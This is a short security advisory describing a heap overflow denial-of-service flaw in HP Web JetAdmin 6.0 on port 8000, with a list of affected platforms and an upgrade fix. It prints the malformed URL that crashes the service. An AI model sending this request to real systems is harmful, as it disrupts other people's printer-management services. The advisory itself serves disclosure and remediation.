COMMAND

    JetAdmin

SYSTEMS AFFECTED

    HP Web JetAdmin Version 6.0

PROBLEM

    UssrLabs  found  a  memory  overflow  heap Vulnerability in HP Web
    JetAdmin Version  6.0 (port  8000) default.   What happens  is  by
    preforming  an  attack  with  a  malformed url information to port
    8000 it  will cause  the proccess  containg the  services to  stop
    responding.

    Affected software versions:

        HP Web JetAdmin Version 6.0 (Microsoft Windows 2000)
        HP Web JetAdmin Version 6.0 (Microsoft Windows NT 4.0)
        HP Web JetAdmin Version 6.0 (HP-UX 10.20)    (not tested)
        HP Web JetAdmin Version 6.0 (HP-UX 11.x)     (not tested)
        HP Web JetAdmin Version 6.0 (Linux - SuSE)   (not tested)
        HP Web JetAdmin Version 6.0 (Novell NetWare) (not tested)
        HP Web JetAdmin Version 6.0 (Red Hat Linux)  (not tested)
        HP Web JetAdmin Version 6.0 (Solaris)        (not tested)

    Example follows.  Original:

        http://SeverIp:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$__hpjwja_ack_ini)(_deviceList)&clearFilters=true&_refreshdevicelist=true&_special=new

    Malformed:

        http://ServerIp:8000/plugins/hpjwja/script/devices_list.hts?&obj=Httpd:GetProfile(new_list,__null,__null,$

SOLUTION

    Obtain and install the latest  release of Web JetAdmin 6.0,  which
    is version 6.0.1233 from the following location:

        http://www.hp.com/cposupport/swindexes/hpwebjetad1880_swen.html